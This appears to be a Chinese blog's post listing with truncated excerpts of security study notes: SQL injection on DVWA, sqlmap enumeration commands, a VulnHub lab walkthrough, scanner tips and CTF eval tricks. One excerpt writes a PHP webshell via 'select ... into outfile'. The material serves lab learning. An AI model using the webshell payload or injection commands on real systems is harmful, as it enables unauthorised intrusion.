摘要:
参考资料: https://blog.csdn.net/qq_45173404/article/details/115712758 一.navicat快捷键 1.ctrl+q :打开查询页面 2.ctrl+/ :注释 3.ctrl+r :运行代码 r是run 4.F6 :打开命令行 一.数据库操作 阅读全文
posted @ 2024-03-25 11:56
aliex23k65
阅读(16)
评论(0)
推荐(0)
摘要:
交换式网络捕获网络流量的方法 参考资料: https://blog.csdn.net/weixin_44143678/article/details/107559329 一.端口镜像 端口镜像,又称为“端口监视”或“端口抄送”,是一种网络管理技术,旨在将网络设备上的特定端口的流量复制到另一个端口,以 阅读全文
posted @ 2024-03-22 15:42
aliex23k65
阅读(111)
评论(0)
推荐(0)
摘要:
1.select语句 其中dvwa是数据库,users是表 2.limit语句 limit 1,3 表示从第一个开始列出3个,也就是第2、3、4个 3.where语句 4.group_concat()语句 group_concat()语句会把要显示的内容放在一行 5.select version() 阅读全文
posted @ 2024-03-13 22:08
aliex23k65
阅读(11)
评论(0)
推荐(0)
该文被密码保护。 阅读全文
posted @ 2024-03-13 20:06
aliex23k65
阅读(0)
评论(0)
推荐(0)
摘要:
一.web权限提升 1.sql写入数据库木马 mysql:select '< eval($_POST['a']);?>' into outfile"D:\phpstudy\www\1.php" 里面有个问号,博客园自动过滤了 阅读全文
posted @ 2024-03-11 20:49
aliex23k65
阅读(10)
评论(0)
推荐(0)
该文被密码保护。 阅读全文
posted @ 2024-03-11 09:25
aliex23k65
阅读(0)
评论(0)
推荐(0)
摘要:
vulhub靶机之lampiao 一.靶机搭建 先下载zip文件后解压,用vmware打开ovf文件即可 下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip 二.信息收集 1.先扫整个网段: nmap -sP 192.168.242.0/24 阅读全文
posted @ 2024-03-10 18:03
aliex23k65
阅读(53)
评论(0)
推荐(0)
摘要:
1.AWVS 可以扫描常规漏洞,如SQL注入、XSS等,但没有框架漏洞,如thinkphp等等 也可以AWVS联合XRAY,直接开代理就行,127.0.0.1:8080,相当于扫描的数据包经过这个代理ip 适合扫别人自己开发的网站,开源cms不容易扫到 2.XRAY 可以扫CVE等等漏洞,常规漏洞也 阅读全文
posted @ 2024-03-05 20:29
aliex23k65
阅读(711)
评论(0)
推荐(0)
摘要:
参考链接: https://blog.csdn.net/silence1_/article/details/90812612 一.sqlmap注入 1.sqlmap -u "http://" --dbs 2.sqlmap -u "http://" -D cms --tables 3.sqlmap - 阅读全文
posted @ 2024-02-27 16:09
aliex23k65
阅读(14)
评论(0)
推荐(0)
摘要:
参考链接: https://blog.csdn.net/qq_49480008/article/details/113177878 1.飘号:``,相当于eval eval(echo cat ????.???;)相当于eval(echo cat flag的内容) web31 或者?c=include 阅读全文
posted @ 2024-02-26 21:35
aliex23k65
阅读(18)
评论(0)
推荐(0)
浙公网安备 33010602011771号